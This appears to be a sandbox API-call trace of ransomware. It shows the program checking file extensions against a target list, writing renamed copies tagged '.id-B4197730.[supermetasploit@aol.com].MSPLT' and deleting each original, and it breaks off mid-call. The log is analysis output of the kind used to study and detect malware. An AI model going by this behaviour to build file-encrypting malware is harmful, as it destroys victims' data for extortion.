[0169.853] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0169.853] lstrlenW (lpString=".xls") returned 4 [0169.853] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0169.853] lstrlenW (lpString=".xlsx") returned 5 [0169.853] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0169.853] lstrlenW (lpString=".ppt") returned 4 [0169.853] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0169.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.854] lstrlenW (lpString=".zip") returned 4 [0169.854] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0169.854] lstrlenW (lpString=".rar") returned 4 [0169.854] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0169.854] lstrlenW (lpString=".bz2") returned 4 [0169.854] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0169.854] lstrlenW (lpString=".7z") returned 3 [0169.854] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0169.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.854] lstrlenW (lpString=".dbf") returned 4 [0169.854] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0169.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.854] lstrlenW (lpString=".1cd") returned 4 [0169.854] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0169.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.854] lstrlenW (lpString=".jpg") returned 4 [0169.854] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0169.854] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0169.854] lstrlenW (lpString="LocalizedData.xml") returned 17 [0169.854] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0170.479] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=72076) returned 1 [0170.480] CloseHandle (hObject=0x30c) returned 1 [0170.480] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml")) returned 0x80 [0170.480] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.117] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0171.117] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0171.117] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0171.117] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0171.179] GetLastError () returned 0x0 [0171.179] ReadFile (in: hFile=0x354, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x1198c, lpOverlapped=0x0) returned 1 [0171.288] WriteFile (in: hFile=0x358, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x11990, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x11990, lpOverlapped=0x0) returned 1 [0171.290] ReadFile (in: hFile=0x354, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0171.290] WriteFile (in: hFile=0x358, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf6, lpOverlapped=0x0) returned 1 [0171.290] SetEndOfFile (hFile=0x358) returned 1 [0171.290] CloseHandle (hObject=0x358) returned 1 [0171.296] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0171.296] SetEndOfFile (hFile=0x354) returned 1 [0171.298] CloseHandle (hObject=0x354) returned 1 [0171.298] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.299] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml")) returned 1 [0171.299] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.299] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.299] lstrlenW (lpString=".doc") returned 4 [0171.299] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.299] lstrlenW (lpString=".docx") returned 5 [0171.299] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.299] lstrlenW (lpString=".pdf") returned 4 [0171.299] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.299] lstrlenW (lpString=".xls") returned 4 [0171.299] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.299] lstrlenW (lpString=".xlsx") returned 5 [0171.299] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.299] lstrlenW (lpString=".ppt") returned 4 [0171.300] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.300] lstrlenW (lpString=".zip") returned 4 [0171.300] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.300] lstrlenW (lpString=".rar") returned 4 [0171.300] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.300] lstrlenW (lpString=".bz2") returned 4 [0171.300] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.300] lstrlenW (lpString=".7z") returned 3 [0171.300] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.300] lstrlenW (lpString=".dbf") returned 4 [0171.300] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.300] lstrlenW (lpString=".1cd") returned 4 [0171.300] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.300] lstrlenW (lpString=".jpg") returned 4 [0171.300] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.300] lstrlenW (lpString=".doc") returned 4 [0171.300] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.300] lstrlenW (lpString=".docx") returned 5 [0171.301] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.301] lstrlenW (lpString=".pdf") returned 4 [0171.301] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.301] lstrlenW (lpString=".xls") returned 4 [0171.301] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.301] lstrlenW (lpString=".xlsx") returned 5 [0171.301] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.301] lstrlenW (lpString=".ppt") returned 4 [0171.301] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.301] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.301] lstrlenW (lpString=".zip") returned 4 [0171.301] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.301] lstrlenW (lpString=".rar") returned 4 [0171.301] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.301] lstrlenW (lpString=".bz2") returned 4 [0171.301] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.301] lstrlenW (lpString=".7z") returned 3 [0171.301] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.301] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.301] lstrlenW (lpString=".dbf") returned 4 [0171.301] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.301] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.301] lstrlenW (lpString=".1cd") returned 4 [0171.301] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.301] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0171.302] lstrlenW (lpString=".jpg") returned 4 [0171.302] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.431] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0171.431] lstrlenW (lpString="LocalizedData.xml") returned 17 [0171.431] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0171.443] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=82374) returned 1 [0171.443] CloseHandle (hObject=0x2fc) returned 1 [0171.443] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml")) returned 0x80 [0171.443] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.443] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0171.443] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0171.443] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0171.443] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0171.443] GetLastError () returned 0x0 [0171.443] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x141c6, lpOverlapped=0x0) returned 1 [0171.648] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x141d0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x141d0, lpOverlapped=0x0) returned 1 [0171.651] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0171.651] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf6, lpOverlapped=0x0) returned 1 [0171.651] SetEndOfFile (hFile=0x2f4) returned 1 [0171.651] CloseHandle (hObject=0x2f4) returned 1 [0171.654] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0171.654] SetEndOfFile (hFile=0x2fc) returned 1 [0171.655] CloseHandle (hObject=0x2fc) returned 1 [0171.656] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.657] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml")) returned 1 [0171.657] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.657] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.657] lstrlenW (lpString=".doc") returned 4 [0171.657] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.657] lstrlenW (lpString=".docx") returned 5 [0171.658] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.658] lstrlenW (lpString=".pdf") returned 4 [0171.658] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.658] lstrlenW (lpString=".xls") returned 4 [0171.658] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.658] lstrlenW (lpString=".xlsx") returned 5 [0171.658] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.658] lstrlenW (lpString=".ppt") returned 4 [0171.658] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.658] lstrlenW (lpString=".zip") returned 4 [0171.658] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.658] lstrlenW (lpString=".rar") returned 4 [0171.658] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.658] lstrlenW (lpString=".bz2") returned 4 [0171.658] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.658] lstrlenW (lpString=".7z") returned 3 [0171.658] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.658] lstrlenW (lpString=".dbf") returned 4 [0171.658] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.658] lstrlenW (lpString=".1cd") returned 4 [0171.658] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.658] lstrlenW (lpString=".jpg") returned 4 [0171.658] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.658] lstrlenW (lpString=".doc") returned 4 [0171.658] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.658] lstrlenW (lpString=".docx") returned 5 [0171.658] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.658] lstrlenW (lpString=".pdf") returned 4 [0171.659] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.659] lstrlenW (lpString=".xls") returned 4 [0171.659] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.659] lstrlenW (lpString=".xlsx") returned 5 [0171.659] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.659] lstrlenW (lpString=".ppt") returned 4 [0171.659] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.659] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.659] lstrlenW (lpString=".zip") returned 4 [0171.659] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.659] lstrlenW (lpString=".rar") returned 4 [0171.659] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.659] lstrlenW (lpString=".bz2") returned 4 [0171.659] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.659] lstrlenW (lpString=".7z") returned 3 [0171.659] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.659] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.659] lstrlenW (lpString=".dbf") returned 4 [0171.659] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.659] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.659] lstrlenW (lpString=".1cd") returned 4 [0171.659] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.659] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0171.659] lstrlenW (lpString=".jpg") returned 4 [0171.659] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.659] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0171.659] lstrlenW (lpString="eula.rtf") returned 8 [0171.659] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0171.668] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=3865) returned 1 [0171.668] CloseHandle (hObject=0x358) returned 1 [0171.668] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf")) returned 0x80 [0171.668] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.668] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0171.668] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0171.668] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0171.668] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0171.686] GetLastError () returned 0x0 [0171.686] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0xf19, lpOverlapped=0x0) returned 1 [0171.724] WriteFile (in: hFile=0x368, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf20, lpOverlapped=0x0) returned 1 [0171.725] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0171.725] WriteFile (in: hFile=0x368, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xe4, lpOverlapped=0x0) returned 1 [0171.726] SetEndOfFile (hFile=0x368) returned 1 [0171.726] CloseHandle (hObject=0x368) returned 1 [0171.728] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0171.728] SetEndOfFile (hFile=0x358) returned 1 [0171.730] CloseHandle (hObject=0x358) returned 1 [0171.730] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.730] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf")) returned 1 [0171.730] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.730] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.730] lstrlenW (lpString=".doc") returned 4 [0171.730] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.731] lstrlenW (lpString=".docx") returned 5 [0171.731] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.731] lstrlenW (lpString=".pdf") returned 4 [0171.731] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.731] lstrlenW (lpString=".xls") returned 4 [0171.731] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.731] lstrlenW (lpString=".xlsx") returned 5 [0171.731] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.731] lstrlenW (lpString=".ppt") returned 4 [0171.731] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.731] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.731] lstrlenW (lpString=".zip") returned 4 [0171.731] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.731] lstrlenW (lpString=".rar") returned 4 [0171.731] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.731] lstrlenW (lpString=".bz2") returned 4 [0171.731] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.731] lstrlenW (lpString=".7z") returned 3 [0171.731] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.731] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.731] lstrlenW (lpString=".dbf") returned 4 [0171.731] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.731] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.731] lstrlenW (lpString=".1cd") returned 4 [0171.731] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.731] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.731] lstrlenW (lpString=".jpg") returned 4 [0171.731] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.731] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.732] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.732] lstrlenW (lpString=".doc") returned 4 [0171.732] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.732] lstrlenW (lpString=".docx") returned 5 [0171.732] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.732] lstrlenW (lpString=".pdf") returned 4 [0171.732] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.732] lstrlenW (lpString=".xls") returned 4 [0171.732] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.732] lstrlenW (lpString=".xlsx") returned 5 [0171.732] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.732] lstrlenW (lpString=".ppt") returned 4 [0171.732] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.732] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.732] lstrlenW (lpString=".zip") returned 4 [0171.732] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.732] lstrlenW (lpString=".rar") returned 4 [0171.732] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.732] lstrlenW (lpString=".bz2") returned 4 [0171.732] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.732] lstrlenW (lpString=".7z") returned 3 [0171.732] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.732] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.732] lstrlenW (lpString=".dbf") returned 4 [0171.732] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.732] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.732] lstrlenW (lpString=".1cd") returned 4 [0171.732] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.732] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0171.732] lstrlenW (lpString=".jpg") returned 4 [0171.732] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.733] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0171.733] lstrlenW (lpString="eula.rtf") returned 8 [0171.733] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0171.733] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=3859) returned 1 [0171.733] CloseHandle (hObject=0x358) returned 1 [0171.733] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf")) returned 0x80 [0171.733] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: 